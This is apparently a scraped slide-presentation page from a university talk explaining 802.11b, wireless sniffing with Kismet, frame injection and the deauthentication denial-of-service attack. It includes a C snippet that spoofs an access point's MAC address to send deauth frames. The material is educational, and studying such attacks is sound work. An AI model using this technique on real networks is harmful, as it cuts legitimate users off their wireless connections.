802 11 attack demo
This presentation is the property of its rightful owner.
Sponsored Links
1 / 24

802.11 Attack Demo PowerPoint PPT Presentation


  • 107 Views
  • Uploaded on
  • Presentation posted in: General

802.11 Attack Demo. Haobo Zhou ([email protected]) L I A C S http://www.liacs.nl/home/hzhou. What Will Be Covered. Overview of 802.11b Wireless network sniffer Frame Injection Deauth/Disassociation Attack Attack Demo. NO!! Thanks. OK !!. Dinner??. ISO OSI Model and 802.11b.

Download Presentation

802.11 Attack Demo

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


802 11 attack demo

802.11 Attack Demo

Haobo Zhou

([email protected])

L I A C S

http://www.liacs.nl/home/hzhou


What will be covered

What Will Be Covered

  • Overview of 802.11b

  • Wireless network sniffer

  • Frame Injection

  • Deauth/Disassociation Attack

  • Attack Demo


802 11 attack demo

NO!!

Thanks

OK

!!

Dinner??


Iso osi model and 802 11b

ISO OSI Model and 802.11b

Overview of 802.11b

Obtained From http://alpha.fdu.edu/~kanoksri/IEEE80211b.html


Overview of 802 11b

Overview of 802.11b

  • Runs over 2.4ghz

    • DSSS - Direct Sequence Spread Spectrum

    • Channels

      • FCC (US) - 11 Channels (1-11)

      • ETSI (EU) - 13 Channels (1-13)

      • France - 4 Channels (10-13)

      • Japan - 14 Channels (1-14)

    • Uses CSMA/CA


Overview of 802 11b1

Overview of 802.11b

  • Uses WEP for Encryption

    • “Wired Equivalent Privacy”

    • Uses RC4

    • 40-bit or 104-bit static key with 24-bit IV


Overview of 802 11b2

Overview of 802.11b

  • Consists of 3 main protocol types

    • Management

    • Control

    • Data


Overview of 802 11b3

Overview of 802.11b

AD Hoc


Overview of 802 11b4

Overview of 802.11b

Infrastructure


Overview of 802 11b5

Beacon

Authentication Req

Authentication Resp

Association Req

Association Resp

Overview of 802.11b

Node

Access Point

Access Point

Accepts Node

Node is Associated


Wireless network sniffer

Wireless network sniffer

wireless networking Detection

  • NIC with monitor mode support

    • why?

      • Management frame

      • Frames belongs to others

  • Tools

    • Kismet

    • others


Wireless network sniffer1

Wireless network sniffer

Networking Interface Card Mode

  • Managed (Infrastructure)

  • Ad-Hoc(AD Hoc )

  • Monitor( Hardware support ??)

  • Master(acts as an AP)


Wireless network sniffer2

Wireless network sniffer

  • KISMET

    • An 802.11 layer2 wireless network sniffer

    • Working on Linux

    • Ethereal/Tcpdump compatable data logging

    • Over 20 supported card types

    • Open source code


Kismet

Kismet


Frame injection

Frame Injection

  • NIC

    • support ?

  • Device Driver

    • support frame injection?

      • Yes- very good

      • NO- Change it!

  • User program


Frame injection1

Frame Injection

  • User program

    • C code in linux

    • RAW socket programming

      • Use PF_PACKET interface to access the link layer

      • sd=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));


Deauthentication attack

Deauthentication Attack

  • Management frames can control link characteristics and physical medium properties

  • 802.11b management frames are NOT authenticated

    • Why is this bad?


Deauthentication attack1

Deauthentication Attack

  • Denial of Service – De-authentication

    • Use MAC address of Access Point

    • Send deauthenticate frames

      • Send continuously

    • Users are unable to reassociate with AP


Deauthentication attack2

Deauthentication Attack

STATE 1

Unauthenticated

Unassociated

STATE 2

Authenticated

Unassociated

Successful

authentication

Deauthentication

Disassociation

Deauthentication

Successful

Association

STATE 3

Authenticated

Associated


Deauthentication attack3

  • Attacker must spoof AP MAC address in Src Addr and BSSID

  • Sequence Control field handled by firmware (not set by attacker)

Deauthentication Attack

Deauth framestructure


Deauthentication attack4

Deauthentication Attack

  • void send_deauth (__u8 *dst, __u8 *bssid)

  • {struct {

  • struct a3_80211hdr;

  • __u16reason;

  • }mgt_frame;

  • memset(&mgt_frame, 0, sizeof(frame));

  • mgt_frame.hdr.mh_type = FC_TYPE_MGT;

  • mgt_frame.hdr.mh_subtype = MGT_DEAUTH;

  • memcpy(&(mgt_frame.hdr.mh_mac1), dst, 6);

  • memcpy(&(mgt_frame.hdr.mh_mac2), bssid, 6);

  • memcpy(&(mgt_frame.hdr.mh_mac3), bssid, 6);

  • mgt_frame.reason = 2;

  • send(socket, &frame, sizeof(mgt_frame), 0);

  • }


802 11 attack demo

Question ?

deauth-attack demo continues


802 11 deauth attack demo

Hardware

Laptop

Wireless card

Atheros 5212 chip

monitor mode support

software

Device Driver

Madwifi

open source project

Two patches to enable frame injection

User program

Fata_jace.c

Hardware

Laptop

Wireless card

Software

Ping

Use ping to make sure the connection

802.11 Deauth-attack DEMO

Attacker

Victim


802 11 attack demo

Thanks

  • Xu Li

  • Wei Wang

  • Google


  • Login